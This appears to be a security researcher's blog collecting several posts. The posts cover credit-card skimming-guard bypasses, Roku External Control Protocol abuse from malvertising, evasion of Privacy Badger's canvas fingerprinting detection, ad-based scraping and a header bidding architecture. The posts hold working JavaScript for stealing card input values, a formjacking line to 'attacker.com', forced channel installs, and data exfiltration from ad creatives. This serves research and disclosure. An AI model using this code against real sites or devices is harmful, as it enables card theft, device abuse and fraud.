All your input are belong to me – 3rd party web security

Hello readers!

Today we are going to discuss another (not just adtech) madness: 3rd parties and their security. To make a long story short, modern web apps contain a lot of code (“tags”) from 3rd parties: analytics, ads, payments, widgets of all sorts (polls, comments) and many more. Generally, this is a good thing: those 3rd parties let the web app owner focus on their core business and offload the implementation and maintenance costs of the desired functionality to a specialized 3rd party.

But this convenience comes at a cost (not only a financial one): 3rd parties are taxing the web with additional latency (but don’t worry, some good people are working on that!), and they introduce 3rd party risk. In the context of web security, this means that if, for example, someone hacks your 3rd party’s CDN, they could replace the original code with malicious code that will execute in your users’ browsers. Generally speaking, this is a special case of a supply chain attack, which follows the path of least resistance: as web applications became more robust over time, attackers now target the weakest link in the chain: the 3rd party suppliers.

Once a 3rd party is breached, the malicious code can do many things; one of them is web skimming. From Wikipedia:

Web skimming is a form of internet or carding fraud whereby a payment page on a website is compromised when malware is injected onto the page via compromising a third-party script service in order to steal payment information.

One of the famous web skimming cases is the Magecart attack, which originally took advantage of vulnerable Magento plugins in order to inject web skimming code into affected e-commerce websites.

Supply chain attacks on web apps through 3rd parties are a growing threat to businesses and users, so naturally, solutions arise, and those solutions can be divided into browser security features and commercial solutions.

On the browser features side, we have Content Security Policy (CSP) and Subresource Integrity (SRI). The former lets web app owners specify a whitelist of hosts that third party scripts must come from, and / or a secret (“nonce”) they must carry, in order to execute. The latter lets web app owners specify a hash of a known good state of the 3rd party code, and if its content produces a different hash, it won’t execute.
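To make this concrete, here’s a minimal sketch of both (the host, nonce and hash are placeholders):

<!-- CSP: only execute scripts from the whitelisted host, or ones carrying the nonce -->
<meta http-equiv="Content-Security-Policy"
      content="script-src https://cdn.trusted-vendor.example 'nonce-r4nd0m'">

<!-- SRI: the browser refuses to execute the script if its content doesn't hash to this value -->
<script src="https://cdn.trusted-vendor.example/widget.js"
        integrity="sha384-BASE64_HASH_OF_KNOWN_GOOD_BUILD"
        crossorigin="anonymous"></script>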

These features are good, but not perfect. In (very) short, authoring and enforcing a truly secure CSP is difficult and likely to break existing, desired 1st party and 3rd party functionality, and SRI requires the web app owner to review the 3rd party code (how do you decide what’s a “known good state”?) and essentially “pins” it to a particular build, which means any update to the 3rd party code introduces a new overhead of review & hash update, which is unrealistic in many scenarios. As a result of these downsides, adoption of both is currently lacking and / or insecure.

On the commercial side, there are literally tens of different companies (why? that’s another post) that offer protection solutions for 3rd party security, ranging from complete enterprise solutions to plain simple SaaS offerings. Technically, they can be divided into two approaches: website scanning and real time monitoring.

Scanning solutions are essentially automated browsers that crawl the monitored web app, which allows complete visibility and classification of each third party and its behaviors, without any integration friction (just submit your web app URL). The downsides are the time gap between attack launch and detection, and manual incident response (no real time blocking). They are also subject to evasions by malicious code, similarly to what I described in “How bot detection technology is abused by malvertisers“.

The real time monitoring solutions are essentially scripts that implement some kind of DOM API access control in order to protect from other, malicious 3rd party scripts, which allows real time detection and blocking without manual incident response. However, they require more integration effort and introduce additional network and runtime latency: since they have to execute before the malicious 3rd party, they must be placed above any other 3rd party as a synchronous script.

Another challenge with real time solutions is that browsers have a huge API surface, which means there are many different ways to achieve a given goal, and that makes monitoring everything (coverage) hard. Let’s demonstrate this point.

First, let’s see how such an access control mechanism might work. Assuming a naive implementation of protection from a web skimming attack, the protection code that tries to prevent a malicious 3rd party from accessing the credit card input field in a payment form might look like:

let descriptor = Object.getOwnPropertyDescriptor(HTMLInputElement.prototype, 'value');
let _get = descriptor.get; // keep a private reference to the native getter
Object.defineProperty(HTMLInputElement.prototype, 'value', {
    get: function () {
        let value = _get.call(this);
        if (/^4580/.test(value)) { // looks like a (Visa) credit card number
            return 'NOPE!';
        } else {
            return value;
        }
    }
});

This code replaces the getter function of the value property on the <input> element’s prototype, and if the value matches a credit card number (a Visa prefix, for the sake of demonstration), it returns ‘NOPE!’ instead of the real value.

The code above is actually pretty similar to a challenge I got from one of the companies operating in this space, where the goal was to find as many bypasses as possible. It was deployed inside a mock ecommerce store with a payment form, which looked similar to the following JSFiddle (which WordPress won’t let me embed anyway. I should move to Substack).

Go ahead, type in a CC-like number, then pop up the console and try to type creditcard.value, and you’ll get a solid “NOPE!”.

So, here are all the methods I came up with to get the value anyway:

  • Change the input type and access an unprotected property:
creditcard.type = 'number';
creditcard.valueAsNumber;
  • Keylogging (the oninput and onchange events can be used as well):
creditcard.onkeypress = (e) => console.log(e.key);
  • Fail the regex test with prototype poisoning (and, while we’re at it, steal a reference to the native getter by hooking Function.prototype.call):
RegExp.prototype.test = () => 0; // the CC check now always fails
let orig_getter;
let _call = Function.prototype.call;
Function.prototype.call = function() {
    orig_getter = this; // steal ref to the native getter
    return 'asd';
};
creditcard.value; // invoke getter
_call.bind(orig_getter)(creditcard); // returns the real value
  • Access the native getter from another realm. This one is similar to one of the methods described in “JavaScript tampering – detection and stealth” (And as I wrote there: “Solving this… requires us to execute the tampering in any newly created iframe, which is cumbersome and non-trivial to implement”):
let f = document.createElement('iframe');
let _get;
document.body.appendChild(f);
_get = Object.getOwnPropertyDescriptor(f.contentWindow.HTMLInputElement.prototype, 'value').get;
_get.call(creditcard);
  • Access by Selection API:
creditcard.select();
window.getSelection().toString();
  • Access by FormData API:
let fd = new FormData(creditcard.form);
fd.get('creditcard');
  • Break the regex test by inserting a prefix:
creditcard.focus();
creditcard.selectionStart = 0; 
creditcard.selectionEnd = 0;
document.execCommand('insertText', true, 'asd');
creditcard.value; // asd4580111111111111
  • Formjacking. Send the request to attacker controlled server:
creditcard.form.action = '//attacker.com';
  • Formjacking without form.action. This method sets the form method to GET, which appends the input names / values as URL parameters, and sets the target property to a same origin iframe, whose URL parameters (which contain the CC value) we can then read:
let ifr = document.createElement('iframe');
ifr.name = 'ftarget';
ifr.style.display = 'none';
document.body.appendChild(ifr);
ifr.onload = e => {
    // the CC value is now in the iframe's query string
    let sp = new URLSearchParams(ifr.contentWindow.location.search);
    console.log(sp.get('creditcard'));
};
let f = creditcard.form;
f.target = 'ftarget';
f.method = 'get';
f.submit();
  • Replace the input with an identical-looking non-input element, whose value we can access:
let p = creditcard.parentNode;
let d = document.createElement('div');
d.contentEditable = 'true';
d.className = creditcard.className;
p.removeChild(creditcard);
p.appendChild(d);
d.innerText; // after user entered CC
  • And my favorite: abuse client side validation to brute force the CC number digit by digit, using the input pattern regex and taking advantage of the ValidityState API. Similar to CSS exfiltration, but applies to inputs without an inline value attribute:
let secret = '';
// '[0-3]+...' -> '[0-i]+...': raise the upper bound of the open range
function incrementRange (pattern, i) {
    return pattern.replace(/-[0-9]\]/, '-' + i + ']');
}
// '...[0-i]+...' -> '...i...': fix the digit we just found in place
function lastRangeToToken (pattern, i) {
    return pattern.replace(/\[0-[0-9]\]\+/, i);
}
// append a fresh '[0-0]+' range before the trailing '[0-9]*', for the next digit
function addRange (pattern) {
    return pattern.replace(/\[0-9\]\*/, match => '[0-0]+' + match);
}
function bruteforce (pattern) {
    creditcard.pattern = pattern;
    for (var i = 0; i < 10; i++) {
        creditcard.pattern = incrementRange(pattern, i);
        // becomes valid for the first time exactly when i equals the next digit
        if (creditcard.validity.valid) {
            secret += i;
            return bruteforce(addRange(lastRangeToToken(creditcard.pattern, i)));
        }
    }
}

bruteforce('[0-0]+[0-9]*');
console.log(secret);

And that’s it! Go ahead and execute any of the methods above inside the JSFiddle and see for yourself.

The next step after stealing the CC number is to exfiltrate it over the network, which opens a bunch of JS cat-and-mouse shenanigans, but that’s enough for today 🙂 Hope you enjoyed, and let me know if you have any more creative methods to solve the challenge above!

Attacking Roku sticks for fun and profit

Hello readers!

It’s really been quite a while, but here I am, back again, and this time we’re going to explore Roku and video ads.

TL;DR: Ad fraud is easy on Roku and it’s possible to remotely install arbitrary channels without user interaction from a malicious ad / website.

Roku

For those who are unfamiliar, Roku is a line of popular media streamers that allow media streaming from different sources, i.e. “channels”, such as Netflix, Apple TV and more. Channels are developed by 3rd party developers and can be found on the “channel store“. They aren’t just media players, but actually feature rich apps (much like mobile apps) in terms of capabilities: they can respond to user interactions and input from sensors, so you can find games, Reddit clients, etc.

Ad tech

Roku offers channel developers both subscriptions and ads as monetization mechanisms. Roku devices are capable of displaying video ads using various industry standard formats, most notably VAST. On the developer side, they offer the Roku Advertising Framework (RAF), an SDK for requesting and rendering video ads, and a self serve platform to promote the channel and increase the audience. On the advertiser side, they offer OneView, which is based on their DataXu acquisition. In order to be eligible for ads monetization, a channel must be approved by Roku, based on its content and engagement metrics.

According to industry rumors, CPMs on Roku are significantly higher than traditional web display and are in the range of tens of dollars, depending on the channel’s content genre, the ad type (pre / mid roll) and the device’s IP geolocation. Funnily enough, sometimes the ads’ CPM can, in fact, be higher than the cost of the Roku device itself, which fits their strategy perfectly, as put by AdExchanger:

Roku’s go-to-market strategy is simple: Get as many streaming devices into as many homes as cheaply as possible, and monetize them through advertising.

Alison Weissbrot

Ad sec

Everybody in adtech knows that high CPMs attract fraudsters, and Roku’s case is no different. In the past, several schemes were found and disclosed.

But it’s not just high CPMs. Roku (and Connected TVs in general) has a weaker threat model, and it’s easier to manipulate the metrics without getting caught. Since Roku ads aren’t rendered inside a browser or webview of any kind, but rather in the platform’s native player, traditional JavaScript based verification tags simply aren’t relevant.

Furthermore, RAF only supports VAST 2 and 3, which don’t even include the AdVerification element, nor the Server Side Ad Insertion verification headers. Generally speaking, what’s left for verification vendors to do is to stuff their pixels inside the VAST Impression and TrackingEvents elements, which only allows them to perform basic checks against the request timings and device IP, similarly to what I’ve described in the past in my overview of pre-bid filtering solutions. All other values are declared and could be easily spoofed by a malicious actor.

Here’s a short list of possible attacks:

  • Channel spoofing (aka counterfeit inventory): there’s no Ads.txt equivalent, so there’s no way to verify the parameters in the bid request, which means esoteric channels can pretend to be Netflix, NBA, or whoever, in order to attract higher bids.
  • Device spoofing: it’s possible to initiate ad requests with a Roku user agent from other agents (apps / browsers). Although this is detectable by TCP/HTTP fingerprints, Roku supports Server Side Ad Insertion, which is ideal for fraud: only one IP is needed, as both the requests and the tracking events (such as “the ad played past the mid quartile”) are initiated, by design, from the publisher’s server.
  • Impression spoofing: with the lack of viewability measurements in CTV, it’s technically possible to initiate ad requests and fire the impression and event pixels without ever drawing anything to the screen. All you need is an HTTP client and an XML parser.

Attacking Roku sticks

All the ad fraud risks detailed above aren’t really Roku specific, but rather apply to CTV advertising in general. However, I got myself a Roku stick specifically in order to analyze it, and I made some rather interesting findings: Roku exposes an “External Control Protocol” over the local network, as described in their docs:

The External Control Protocol (ECP) enables a Roku device to be controlled over a local area network by providing a number of external control services. The Roku devices offering these external control services are discoverable using SSDP (Simple Service Discovery Protocol). ECP is a simple RESTful API that can be accessed by programs in virtually any programming environment.

While very convenient for the users, who can install things such as mobile Roku remote apps and they just work, ECP does not include any authentication, which means anything inside the LAN could use it to issue ECP commands to the Roku device.

So at least in theory, it’s possible to control Roku devices by executing JavaScript code in a browser that is running on the same LAN. Sounds great, doesn’t it? Luckily, the default ECP port, 8060, is not blocked by browsers (some other ports are blocked, such as 22 for SSH, because the exact same attack could be used against other sensitive services).

It means an attacker could, for example, run malicious JavaScript code through ad networks, i.e. a malvertising campaign, and send ECP commands to Roku devices, if the user behind the browser has one (and the attacker is able to locate its IP address, more on that later). I wanted to focus on this specific attack because it’s fairly easy to get your JS running cheaply, in large volumes, by (ab)using ad networks, which is important in order to make the attack practical and economically feasible, by keeping the cost of “user acquisition” reasonable relative to its monetization potential.

I wanted to see what’s possible with ECP, and going over the “general commands” in the docs (linked above), two of them immediately jumped out: install/<APP_ID> and keypress/<KEY>. As their names suggest, the former lets you launch the install screen of an arbitrary app (channel) id, and the latter allows you to press whatever key you want, as if you were holding the Roku’s remote in your hand. Together, they are a powerful combination, since you can install (and launch) any app on the victim’s device.

Now, let’s assume we have developed and uploaded an app to the Roku channel store, and we want to install it on as many devices as possible. We would want to do so because we could:

  • Create a paid channel and collect the payments from the victims. Remember, they didn’t choose to install anything, we force their device to install our app with ECP. Easy, but considered CC fraud, and the FBI will find you 🙂
  • Create a free channel and monetize it with ads. The challenge is that in order to display ads, the channel must be launched. Although it’s possible to launch it with ECP, it’s not stealthy. The user will notice that an unwanted channel is running and will close it and probably remove it. One solution to this problem is to find a bug in BrightScript (Roku’s app programming language) or another system component and exploit it for privilege escalation, then install a daemon directly on the OS (Roku OS is Linux), but that’s hard. A much easier solution would be to install a screensaver, which, according to the docs, “is a channel which is run automatically when the system has been idle for a period of time.”

Now that we have two viable monetization options which we can execute by (ab)using ECP, the next missing step is finding the Roku’s IP address. Normally we would use an SSDP search request, but unfortunately, in our malvertising scenario, we cannot read the SSDP response due to the browser’s Same Origin Policy, so another approach is needed – we have to do local network scanning in JavaScript, from the browser 🙂

The first step would be to find the address range that we need to scan, so the WebRTC Peer Connection immediately comes to mind, because it uses ICE for NAT traversal and used to expose the internal IP of the client through SDP. This feature was abused in the past by fingerprinting vendors, most famously on the NYTimes website by WhiteOps. Unfortunately (or fortunately, depending on how you look at it), not long before the time of this writing, browsers started to implement a proposal to use mDNS to protect users’ privacy when exposing ICE candidates, which means you’ll get an address that looks like 1f528c83-551f-4f34-ad3a-67524d2fed83.local instead of 192.168.1.4.
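Just for reference, here’s a minimal sketch of that old trick (the exact candidate format varies between browsers):

let pc = new RTCPeerConnection({ iceServers: [] });
pc.createDataChannel(''); // needed so ICE gathering actually starts
pc.onicecandidate = (e) => {
    if (!e.candidate) return; // gathering finished
    // pre-mDNS browsers leaked e.g. '... 192.168.1.4 ...' in this line;
    // current ones show an obfuscated '<uuid>.local' hostname instead
    console.log(e.candidate.candidate);
};
pc.createOffer().then((offer) => pc.setLocalDescription(offer));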

There are three blocks of IP addresses reserved for private networks:

10.0.0.0 – 10.255.255.255 (10/8 prefix)

172.16.0.0 – 172.31.255.255 (172.16/12 prefix)

192.168.0.0 – 192.168.255.255 (192.168/16 prefix)

For the sake of simplicity of our PoC, we are going to brute force scan only the last one (192.168/16), which is the most commonly used by home routers anyway, and they usually assign new client IPs (using DHCP) in the same subnet.

So what do we need now? A way to differentiate between the following options:

  1. an address that does not exist on the network
  2. an address that does exist, but doesn’t belong to a Roku device
  3. an address that exists and belongs to a Roku device

Achieving this goal was possible using the following method:

For each IP address, initiate an HTTP GET request to Roku’s ECP port (8060), with a Roku specific URL path (for example, 192.168.0.1:8060/query/apps). For 1, the error event will be fired only after the browser’s timeout has passed, because the address is unreachable. For 2, the error event will be fired quickly, because the connection is refused or the response isn’t a loadable resource. For 3, the load event will be fired, and we can use it to identify the Roku’s IP address.

Note that the requests must be HTTP and not HTTPS, as Roku’s ECP doesn’t support HTTPS. Up until recently this was not a problem, because by using passive mixed content we could initiate HTTP requests from HTTPS pages, so we could run this network scan logic directly inside the malicious ad’s creative code.

However, Chrome recently started blocking mixed content (HTTP content on HTTPS websites) by default, without falling back to HTTP when the content isn’t available over HTTPS. Since most websites / ads are served nowadays over HTTPS, this makes it impossible to use this method directly in the ad, but it’s still possible to do so from an attacker controlled HTTP web page, either by making it the destination of the ad’s landing page (and buying PPC), or by just programmatically force redirecting the user to such a page, which is a commonly used malvertising practice.

The following PoC code demonstrates this logic:

EDIT: After giving it a second thought, I won’t publicly share the PoC code. Although all the details needed in order to implement it are available here in this post, I don’t want to help script kiddies to launch attacks 🙂

So, after we’ve found the IP address, all that’s left is to send the ECP commands to install our channel:

let rokuAddress = 'http://192.168.1.8:8060'; // found previously with the scanner
let appId = 14; // MLB is just used for demonstration, replace with our malicious channel id
let install = '/install/' + appId;
let keypress = '/keypress/';
let select = keypress + 'Select';
let home = keypress + 'Home';
function postToRoku (cmd) {
    // no-cors: we can't read the response, but the command still goes through
    return fetch(rokuAddress + cmd, {method: 'POST', mode: 'no-cors'});
}
// launch the install screen
postToRoku(install).then(res => {
    // press the install button
    postToRoku(select).then(res => {
        // go back to home screen
        postToRoku(home);
    });
});

And, voila! Our channel just got installed on the victim’s Roku.

I really think this attack is not only theoretical, but a practical one. It’s possible to fix it by including a token in the initial SSDP response, which must then be included in any subsequent ECP request. This way, the Roku device could verify that the ECP requests are coming from a party that’s able to read the SSDP response, such as a remote control mobile app, and not from a browser. Unfortunately, this is not backward compatible and would probably break existing apps that are built on top of ECP.

If you liked this post, are interested in ad security and want to chat – don’t hesitate to contact me! I’m also currently looking for new projects.

Detecting Privacy Badger’s Canvas FP detection

Hello readers! As promised in the previous blog post, today I’ll write (a bit more technically) about third party JS security, but from a different angle.

Privacy Badger

Privacy Badger is a privacy focused browser extension by the EFF that detects and blocks third party trackers. Unlike other extensions, it does so by analyzing tracking behaviors, rather than relying on a domain blacklist.

Canvas fingerprinting

One of these tracking behaviors is canvas fingerprinting, which I briefly mentioned in previous blog posts. Generally speaking, canvas fingerprinting is a method to generate a stateless, consistent, high entropy identifier from the HTML5 canvas element, by drawing several graphics primitives into it and then serializing its pixels. Different browsers and devices produce slightly different pixels due to differences in their graphics rendering stacks. You can read the paper “Pixel Perfect: Fingerprinting Canvas in HTML5” for more info.
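To illustrate, a minimal fingerprinting sketch might look like this:

let canvas = document.createElement('canvas');
let ctx = canvas.getContext('2d');
// draw primitives whose rasterization differs subtly between devices
ctx.textBaseline = 'top';
ctx.font = '14px Arial';
ctx.fillStyle = '#f60';
ctx.fillRect(0, 0, 120, 30);
ctx.fillStyle = '#069';
ctx.fillText('canvas fingerprint 1.0', 2, 2);
// serialize the pixels; hashing this string yields the identifier
let fingerprint = canvas.toDataURL();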

Privacy Badger Canvas fingerprinting detection

From Privacy Badger website:

Does Privacy Badger prevent fingerprinting?

Browser fingerprinting is an extremely subtle and problematic method of tracking, which we documented with the Panopticlick project. Privacy Badger 1.0 can detect canvas based fingerprinting, and will block third party domains that use it. Detection of other forms of fingerprinting and protections against first-party fingerprinting are ongoing projects. Of course, once a domain is blocked by Privacy Badger, it will no longer be able to fingerprint you.

How Privacy Badger detects canvas fingerprinting

Privacy Badger injects fingerprinting.js, along with several other content scripts, as specified in its manifest.json, into all the frames (all_frames: true) of all the pages (“matches”: [ “<all_urls>” ]) visited by the user, before any other script in the page has executed (run_at: document_start).

Content scripts have access to their frame’s DOM, but run in a separate JavaScript context. Because the goal of the script requires monitoring things that happen in the page’s JS context (canvas manipulation and serialization), this content script injects another, self removing script into the frame’s DOM, which executes in its JS context.

This script hooks into several canvas related APIs, including fillText (manipulation) and toDataURL (serialization). I wrote about JS hooking before, in the context of spoofing viewability measurements. Whenever one of these APIs gets called, Privacy Badger’s hook figures out the calling script’s URL from within the call stack.
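The general idea looks roughly like this (a hedged sketch, not Privacy Badger’s exact code):

function getCallerScriptUrl() {
    let frames = new Error().stack.split('\n');
    // skip the frames that belong to the hook itself; the next frame containing
    // an http(s) URL belongs to the script that invoked the canvas API
    for (let frame of frames.slice(2)) {
        let match = frame.match(/(https?:\/\/.+?):\d+:\d+/);
        if (match) return match[1];
    }
}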

Threat Model

When designing and implementing fingerprinting countermeasures, there are two significant concerns:

  • Observability: trackers can fingerprint the presence of the fingerprinting countermeasure itself and use it as another data point in the fingerprint.
  • Bypassability: trackers can evade the fingerprinting countermeasure or render it useless, thus getting access to the desired fingerprinted feature.

Vulnerabilities in Privacy Badger canvas fingerprinting detection

  • Observability of the canvas API hooking:

As I wrote previously, in depth, at “JavaScript tampering – detection and stealth” (my most visited blog post so far!), there are several methods to detect that a native function was tampered with. Privacy Badger recognized this threat and tries to hide the tampering by setting the length, name, and toString properties of the hooked functions to match those of the original, but since it doesn’t patch the native Function.prototype.toString itself, a tracker can write:

Function.prototype.toString.call(HTMLCanvasElement.prototype.toDataURL);

And get:

"function wrapped() {
          var args = arguments;
...

Of course, it also won’t pass the prototype and hasOwnProperty tests (detailed explanation here).

  • Bypassability of the API hooking

Privacy Badger recognized the threat of site code tampering with its own code, and tries to prevent it by copying the objects it uses into its own function scope. However, it still relies on prototype inherited methods inside the hook code itself, and these methods can be abused to steal a reference to the original API. Let’s look closely at the hook code itself, which gets called whenever a consumer calls one of the hooked canvas APIs:

        function wrapped() {
          var args = arguments;

          if (is_canvas_write) {
            // to avoid false positives,
            // bail if the text being written is too short
            if (!args[0] || args[0].length < 5) {
              return orig.apply(this, args);
            }
          }

          var script_url = (
              V8_STACK_TRACE_API ?
                getOriginatingScriptUrl() :
                getOriginatingScriptUrlFirefox()
            ),
            msg = {
              obj: item.objName,
              prop: item.propName,
              scriptUrl: script_url
            };

          if (item.hasOwnProperty('extra')) {
            msg.extra = item.extra.apply(this, args);
          }

          send(msg);

          if (is_canvas_write) {
            // optimization: one canvas write is enough,
            // restore original write method
            // to this CanvasRenderingContext2D object instance
            this[item.propName] = orig;
          }

          return orig.apply(this, args);
        }

As we can see, there’s an interesting exception: if is_canvas_write is true and the length of the first arg is shorter than 5, the original function gets called, using the prototype inherited apply method, and the hook returns before send(msg) is called, so Privacy Badger won’t consider it a fingerprinting attempt, to avoid false positives.

We can look a few lines up and see that is_canvas_write is computed as:

      var is_canvas_write = (
        item.propName == 'fillText' || item.propName == 'strokeText'
      );

So, our attack will look like this:

    • Hook the apply method
    • Call the hooked fillText or strokeText with a short string (under 5 characters, so Privacy Badger doesn’t report it)
    • Steal the reference to the original fillText or strokeText from within our apply hook
    • Write the fingerprint text to the canvas using the original function

Let’s implement a PoC:

let _apply = Function.prototype.apply;
let original;
Function.prototype.apply = function () {
	// `this` is the function
	if (this.name === 'fillText' || this.name === 'strokeText') {
		original = this;
	}
	// restore the original apply
	Function.prototype.apply = _apply;
};

Then, we call the function:

var canvas = document.createElement('canvas');
var ctx = canvas.getContext('2d');
ctx.fillText('a');

And now we have the original fillText:

original
ƒ fillText() { [native code] }

Voila!

The same technique can be used to extract the original serialization method, toDataURL. Also notice the call to getOriginatingScriptUrl, which also uses prototype inherited methods that can be tampered with.

Another bypass method is to obtain references to the original APIs by using the iframe sandbox attribute. This attribute allows us to specify permissions for the content inside the iframe, and if we specify the allow-same-origin permission and don’t specify the allow-scripts permission, the script injected by the content script won’t execute, according to the sandbox policy[1], but the embedding page will still be able to access the iframe’s contentWindow and obtain an unhooked canvas from it.
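A minimal sketch of this bypass (subject to the browser caveat in the footnote):

let f = document.createElement('iframe');
// our page can reach into the frame, but no scripts run inside it,
// so the injected hooks never execute there
f.sandbox = 'allow-same-origin';
document.body.appendChild(f);
// grab clean, unhooked canvas APIs from the sandboxed realm
let cleanFillText = f.contentWindow.CanvasRenderingContext2D.prototype.fillText;
let cleanToDataURL = f.contentWindow.HTMLCanvasElement.prototype.toDataURL;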

That’s it for today! Although this topic could be expanded even more, I’ll save something for next time 🙂

Hope you enjoyed, and feel free to contact me to discuss any of it!

[1] This is currently true in Firefox, but not in Chrome. In the past I observed the same behavior in Chrome, but from my tests it seems that now a DOM script added by a content script will execute inside sandboxed iframes. I’m not sure if that’s intentional.

Bypassing anti scraping systems

Hello readers! Today we’re going to talk about how to bypass anti scraping systems.

First, let’s talk about scraping. From Wikipedia:

Web scraping, web harvesting, or web data extraction is data scraping used for extracting data from websites. Web scraping software may access the World Wide Web directly using the Hypertext Transfer Protocol, or through a web browser. While web scraping can be done manually by a software user, the term typically refers to automated processes implemented using a bot or web crawler. It is a form of copying, in which specific data is gathered and copied from the web, typically into a central local database or spreadsheet, for later retrieval or analysis.

Scraping is widely used in a variety of industries for various reasons. For example, it’s often used by e-commerce companies to spy on their competitors’ prices, by travel agencies to gather flight route data, by real estate companies for rental data, etc.

In many cases, the original author, owner or publisher of the data doesn’t want competitors to take their data for free, or at all, because they want to stay ahead of the competition.

These competing needs created two industries: one of companies specializing in scraping as a service, the other of companies specializing in scraping detection and prevention. The latter use the same bot detection techniques I wrote about in the past in the context of online advertising fraud, namely browser and bot fingerprinting. I also already wrote about cheating browser fingerprinting, so what is the difference this time?

The answer is that we are lazy and don’t want to work harder than necessary. Instead of carefully forging legit FPs for each anti scraping vendor used by our targets, we can just bypass it all entirely by breaking their security model assumptions. To get to the point: we don’t even need a bot to successfully scrape data off most websites.

But how? The answer is exploiting third party JavaScript that runs on the target website and has access to the website’s DOM. We could, for example, hack the CDN of the website’s analytics provider and add our scraping code to the tracker, but that would be both difficult and highly illegal. Instead, we can use the easiest, cheapest way to get our code to run on someone else’s website, you’ve guessed it, online advertising!

As long as the ads are rendered in a same origin iframe, which is frequently the case, we can just access top.document, find what we need, extract the data and send it back to our servers. No bot required whatsoever. Modern ad serving systems make our lives easier, because we can target specific websites of interest, and once our creative loads in their page, we can use iframes, CORS XHRs and other techniques to extract data from even more pages on the site.
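A minimal sketch of such a creative’s logic (the selector and the collection endpoint are, of course, hypothetical):

try {
    let doc = window.top.document; // throws if we ended up in a cross-origin iframe
    let prices = [...doc.querySelectorAll('.product .price')]
        .map(el => el.textContent.trim());
    // exfiltrate to our collection server
    navigator.sendBeacon('https://collector.example/prices', JSON.stringify(prices));
} catch (e) {
    // cross-origin iframe, no direct DOM access – bail
}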

This method is just a special case of malvertising, or even more generally, third party risk. This category includes many more attacks. Recently I dived deep into this space, as I’ve seen several interesting attacks (Magecart etc.) and startup companies offering solutions to those. Maybe I’ll write some more about that. Hope you enjoyed the post, and feel free to contact me for further discussion!

Secure header bidding architecture

Hello readers! It’s been quite a while. Today, I want to suggest a less insecure bot filtering architecture for online advertisers and publishers.

First, let’s have a quick overview of the current situation and define some terms:

Header bidding

Forget all the nonsense about a “wrapper” that “sits in the header” and “wraps calls to the ad server with other demand partners”. I’ve read and heard explanations along these lines way too many times, and they are a great example of complete adtech (jargon) madness. Like pretty much anything else in the browser, the “wrapper” is just a script that makes some network calls and executes some logic. Whether it’s located in the <head> or <body> is a completely irrelevant implementation detail. </rant>

In technical terms, a header bidding library defines an interface that its adapters implement, allowing its consumers to use a unified API to communicate with all of their demand partners. It was originally invented as a hack to create fair competition between AdX supply and other SSPs, and the de facto standard is Prebid.js (pbjs), which was originally created by AppNexus. Most other “unique proprietary header bidding wrappers” are just clones of pbjs with a changed global variable name, and maybe some other niche features that cost way too much money for their value.

The general flow of pbjs looks like this:

The user loads the page, and pbjs is loaded with it. The page includes definitions of its ad units, sizes, media types, etc, and pbjs sends this info, along with the user info, to the configured demand partners by invoking their adapters. Then pbjs waits for responses from all demand partners, or until a specified timeout, passing all the returned bids to the ad server using key-value targeting. The ad server receives the ad request with the competing bids, runs its ad selection process, and returns its own creative if it has a better paying line item, and if not, a pre-configured pbjs creative that basically tells pbjs to render its highest bid’s ad markup.
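In code, a minimal setup looks roughly like this (the ad unit, bidder and placement id are placeholders, and GPT is assumed as the ad server tag):

pbjs.que.push(function () {
    pbjs.addAdUnits([{
        code: 'div-banner-1',
        mediaTypes: { banner: { sizes: [[300, 250]] } },
        bids: [{ bidder: 'appnexus', params: { placementId: 12345 } }]
    }]);
    pbjs.requestBids({
        timeout: 1000, // wait for all bidders, or bail out after 1s
        bidsBackHandler: function () {
            // pass the returned bids to the ad server via key-value targeting
            pbjs.setTargetingForGPTAsync();
            googletag.cmd.push(function () { googletag.pubads().refresh(); });
        }
    });
});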

So far so good.

Bot detection

As I wrote before, current bot detection for advertising has two phases: pre-bid and post-bid. To summarize, pre-bid detection is based on the network properties of the client that makes the bid request, and post-bid is based on browser fingerprinting. The advantage of pre-bid detection is that it happens before money is spent; the disadvantage is that it’s less accurate and reliable than post-bid, which is, on the other hand, more secure, but occurs after the ad is already served and money is already spent.


Server to server

Remember I wrote about pbjs, “Then pbjs waits for responses from all demand partners, or until a specified timeout”? It’s actually a bigger deal than it sounds at first. Latency is a big burden on both user experience and CPM rates (as it negatively affects viewability and the number of served impressions), so a solution emerged in the form of Prebid Server. It works the same as the regular pbjs flow, but instead of invoking bidders from the client’s browser, it invokes them from a dedicated server, returning to the client only the winning bid.

But it also breaks the security model of pre-bid bot detection, since now the client isn’t making the bid requests to the SSPs by design, and that’s bad, because now bots are detected only after money is spent.


My suggested solution

Bot detection vendors should set up a Prebid Server that sits as a proxy between the publisher and the SSPs. They should then convince publishers to add their code, perhaps as a Prebid module, which will contain their bot fingerprinting code and will append its results to the initial request to the Prebid Server. The results should be mandatory: if they are not included, no bid requests will be passed to demand partners.
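A hypothetical sketch of what this could look like on the publisher’s page (the module name, endpoint and signal format are all invented for illustration):

pbjs.que.push(function () {
    // route all bid requests through the vendor's Prebid Server proxy
    pbjs.setConfig({
        s2sConfig: {
            enabled: true,
            adapter: 'prebidServer',
            accountId: 'pub-123',
            bidders: ['appnexus', 'rubicon'],
            endpoint: 'https://pbs.botfilter.example/openrtb2/auction'
        }
    });
    // the vendor's module runs its fingerprinting code and attaches the result;
    // the proxy refuses to fan bid requests out if the signal is missing
    botFilter.collect().then(function (signal) {
        pbjs.setConfig({ ortb2: { site: { ext: { data: { botSignal: signal } } } } });
        pbjs.requestBids({ /* ... */ });
    });
});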

With this architecture, advertisers get the best of both worlds: the security of post-bid detection solutions with the money saving effect of pre-bid detection solutions.

For publishers, the incentive to implement this module will be higher CPMs and viewability rates, since all of their traffic is now validated. It’s also technically possible to create a module that reads the client side pbjs config and automatically redirects it through the Prebid Server, which saves the publisher the technical overhead of moving to Prebid Server, while gaining the latency improvements.

The challenges of this solution are the costs associated with the required amounts of network and computational resources, but it may be possible to make it economical.

Let me know what you think! I’m waiting to see more JIRA referrers to the blog now 😉